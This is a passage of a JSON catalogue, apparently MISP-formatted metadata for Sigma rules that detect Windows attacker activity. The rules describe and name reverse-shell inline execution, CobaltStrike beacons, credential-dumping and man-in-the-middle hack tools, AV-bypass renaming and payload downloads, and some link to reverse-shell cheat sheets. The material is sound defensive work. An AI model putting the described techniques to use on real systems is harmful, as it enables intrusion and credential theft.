(@nahamike01)", "creation_date": "2020-03-08", "falsepositive": [ "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "filename": "proc_creation_win_csi_use_of_csharp_console.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml" ], "tags": [ "attack.execution", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "value": "Suspicious Use of CSharp Interactive Console" }, { "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-05-27", "falsepositive": [ "Possible but rare" ], "filename": "proc_creation_win_rundll32_no_params.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ber_m1ng/status/1397948048135778309", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" ], "tags": [ "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", "value": "Rundll32 Execution Without CommandLine Parameters" }, { "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", "meta": { "author": 
"Florian Roth (Nextron Systems), Microsoft (idea)", "creation_date": "2022-08-04", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_iis_susp_module_registration.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml" ], "tags": [ "attack.persistence", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "043c4b8b-3a54-4780-9682-081cb6b8185c", "value": "Suspicious IIS Module Registration" }, { "description": "Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. 
An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversary's Addins.Store payload.\n", "meta": { "author": "Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)", "creation_date": "2023-09-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_addinutil_uncommon_cmdline.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f2cd9b6-4a17-440f-bb2a-687abb65993a", "value": "Uncommon AddinUtil.EXE CommandLine Execution" }, { "description": "Detects the sc.exe utility adding a new service with a special permission that hides that service.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_modification.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://twitter.com/0gtweet/status/1628720819537936386", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", 
"attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "98c5aeef-32d5-492f-b174-64a691896d25", "value": "Service Security Descriptor Tampering Via Sc.EXE" }, { "description": "Detects execution of python using the \"-c\" flag. This is could be used as a way to launch a reverse shell or execute live python code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Python libraries that use a flag starting with \"-c\". Filter according to your environment" ], "filename": "proc_creation_win_python_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://docs.python.org/3/using/cmdline.html#cmdoption-c", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "899133d5-4d7c-4a7f-94ee-27355c879d90", "value": "Python Inline Command Execution" }, { "description": "Detects the execution of a system command via the ScreenConnect RMM service.", "meta": { "author": "Ali Alwashali", "creation_date": "2023-10-10", "falsepositive": [ "Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used." 
], "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/pull/4467", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1f73849-6329-4069-bc8f-78a604bb8b23", "value": "Remote Access Tool - ScreenConnect Remote Command Execution" }, { "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "value": "Suspicious Invoke-WebRequest Execution" }, { "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", "meta": { "author": "Nasreddine Bencherchali (Nextron 
Systems)", "creation_date": "2022-06-13", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535663791362519040", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", "value": "Execute Pcwrun.EXE To Leverage Follina" }, { "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/p0dalirius/LDAPmonitor", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_ldap_monitor.yml" ], "tags": [ "attack.discovery" ] }, "uuid": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "value": "HackTool - SharpLDAPmonitor Execution" }, { "description": "Detects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB.\nThe free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com.\nThe tool has been observed in use by threat groups including Akira ransomware.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2023-12-20", "falsepositive": [ "Legitimate usage of Cloudflare Quick 
Tunnel" ], "filename": "proc_creation_win_cloudflared_quicktunnel_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.intrinsec.com/akira_ransomware/", "https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/", "https://github.com/cloudflare/cloudflared", "https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_quicktunnel_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1090.001" ] }, "related": [ { "dest-uuid": "f6dacc85-b37d-458e-b58d-74fc4bbf5755", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "222129f7-f4dc-4568-b0d2-22440a9639ba", "value": "Cloudflared Quick Tunnel Execution" }, { "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", "meta": { "author": "Markus Neis, @Karneades", "creation_date": "2018-03-06", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.s0111", "attack.g0022", "attack.g0060", "car.2013-08-001", "attack.t1053.005", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56c217c3-2de2-479b-990f-5c109ba8458f", "value": "HackTool - Default PowerSploit/Empire Scheduled Task Creation" }, { "description": "Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.", "meta": { "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate use of the system utilities to discover system time for legitimate reason" ], "filename": "proc_creation_win_remote_time_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1124" ] }, "related": [ { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b243b280-65fe-48df-ba07-6ddea7646427", "value": "Discovery of a System Time" }, { "description": "Detects a Powershell process that contains download commands in its command line string", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_download_patterns.yml", "level": 
"medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", "https://hatching.io/blog/powershell-analysis/", "https://lab52.io/blog/winter-vivern-all-summer/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "value": "PowerShell Download Pattern" }, { "description": "Detects when a user downloads a file from an IP based URL using CertOC.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certoc_download_direct_ip.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml" ], "tags": [ "attack.command-and-control", "attack.execution", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "value": "File Download From IP Based URL Via CertOC.EXE" }, { "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], 
"filename": "proc_creation_win_python_adidnsdump.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_adidnsdump.yml" ], "tags": [ "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "value": "PUA - Adidnsdump Execution" }, { "description": "Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'", "meta": { "author": "Konstantin Grishchenko, oscd.community", "creation_date": "2020-10-17", "falsepositive": [ "Legitimate usage by software developers" ], "filename": "proc_creation_win_csi_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Z3Jpa29z/status/1317545798981324801", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/", "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml" ], "tags": [ "attack.execution", "attack.t1072", "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b95d31-1afc-469e-8d34-9a3a667d058e", "value": "Suspicious Csi.exe Usage" }, { "description": "Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.", "meta": { "author": "pH-T (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_stracciatella_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/mgeeky/Stracciatella", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_stracciatella_execution.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a4d9232-92fc-404d-8ce1-4c92e7caf539", "value": "HackTool - Stracciatella Execution" }, { "description": "Detects known WMI recon method to look for unquoted service paths using wmic. 
Often used by pentester and attacker enumeration scripts", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_unquoted_service_search.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_unquoted_service_search.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", "value": "Potential Unquoted Service Path Reconnaissance Via Wmic.EXE" }, { "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", "meta": { "author": "Florian Roth (Nextron Systems), Tigzy", "creation_date": "2021-11-17", "falsepositive": [ "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "filename": "proc_creation_win_winrar_uncommon_folder_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/cyb3rops/status/1460978167628406785", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", "value": "Winrar Execution in Non-Standard Folder" }, { "description": "Detects command line parameters used by Koadic hack tool", "meta": { "author": "wagga, Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-01-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_koadic.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml" ], "tags": [ "attack.execution", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", "value": "HackTool - Koadic Execution" }, { "description": "Detects usage of \"cdb.exe\" to launch arbitrary processes or commands from a debugger script file", "meta": { "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-10-26", "falsepositive": [ "Legitimate use of debugging tools" ], "filename": "proc_creation_win_cdb_arbitrary_command_execution.yml", "level": "medium", 
"logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1534957360032120833", "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cdb_arbitrary_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1106", "attack.defense-evasion", "attack.t1218", "attack.t1127" ] }, "related": [ { "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", "value": "Potential Binary Proxy Execution Via Cdb.EXE" }, { "description": "Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.\nCurrently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.\n", "meta": { "author": "Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dump64_defender_av_bypass_rename.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1460597833917251595", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dump64_defender_av_bypass_rename.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "129966c9-de17-4334-a123-8b58172e664d", "value": "Potential Windows Defender AV Bypass Via Dump64.EXE Rename" }, { "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_regsvr32_remote_share.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.010" ] }, "related": [ { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "value": "Suspicious Regsvr32 Execution From Remote Share" }, { "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-24", "falsepositive": [ "Very unlikely" ], "filename": "proc_creation_win_hktl_inveigh.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Kevin-Robertson/Inveigh", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", "value": "HackTool - Inveigh Execution" }, { "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_parents.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/x86matthew/status/1505476263464607744?s=12", "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_parents.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "value": "Suspicious Process Parents" }, { "description": "Detects a \"regsvr32\" execution where the DLL doesn't contain a common file extension.", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-07-17", "falsepositive": [ "Other legitimate extensions currently not in the list either from third party or specific Windows components." 
], "filename": "proc_creation_win_regsvr32_uncommon_extension.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_uncommon_extension.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574", "attack.execution" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "50919691-7302-437f-8e10-1fe088afa145", "value": "Regsvr32 DLL Execution With Uncommon Extension" }, { "description": "Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks", "meta": { "author": "Bhabesh Raj, X__Junior (Nextron Systems)", "creation_date": "2021-07-30", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_expand_cabinet_files.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f107a84-532c-41af-b005-8d12a607639f", "value": "Potentially Suspicious Cabinet File Expansion" }, { "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This could be used as a way to launch a reverse shell or execute live perl code.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_perl_inline_command_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "value": "Perl Inline Command Execution" }, { "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", "meta": { "author": "E.M. 
